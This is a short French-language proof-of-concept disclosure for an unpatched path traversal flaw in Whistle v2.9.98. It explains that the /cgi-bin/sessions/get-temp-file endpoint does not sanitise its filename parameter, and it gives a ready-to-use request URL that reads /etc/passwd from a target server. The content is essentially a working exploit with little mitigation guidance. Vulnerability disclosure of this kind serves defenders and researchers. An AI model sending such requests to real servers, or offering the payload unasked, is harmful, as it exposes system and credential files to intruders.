
PoC pour une vulnérabilité de type Path Traversal dans Whistle v2.9.98 via l'endpoint /cgi-bin/sessions/get-temp-file. (Non corrigé)
Whistle 2.9.98 contient une vulnérabilité de traversée de chemin non corrigée car le point de terminaison /cgi-bin/sessions/get-temp-file ne parvient pas à désinfecter correctement l'entrée utilisateur dans le paramètre filename. En fournissant des chemins absolus ou des séquences de traversée comme /etc/passwd, un attaquant peut contourner les restrictions de répertoire et lire directement des fichiers système sensibles sur le serveur sous-jacent.
POC pour lire le fichier /etc/passwd
http://$target/cgi-bin/sessions/get-temp-file?filename=/etc/passwd
